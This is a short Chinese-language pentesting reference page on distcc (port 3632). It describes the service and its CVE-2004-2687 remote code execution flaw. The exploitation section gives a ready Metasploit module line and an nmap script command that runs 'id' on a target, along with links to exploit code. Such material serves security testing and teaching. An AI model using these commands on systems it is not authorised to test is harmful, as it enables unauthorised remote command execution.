3632 - Pentesting distcc

基本信息

Distcc是一种工具，通过利用网络中其他计算机的空闲处理能力来增强编译过程。当在一台机器上设置distcc时，该机器能够将其编译任务分发给另一台系统。接收系统必须运行distccd守护程序，并且必须安装有兼容的编译器以处理发送的代码。

默认端口： 3632

PORT     STATE SERVICE
3632/tcp open  distccd

漏洞利用

检查是否容易受到 CVE-2004-2687 漏洞的影响，以执行任意代码：

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

我认为shodan没有检测到这项服务。

资源

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

由 Álex B (@r1p) 创建的帖子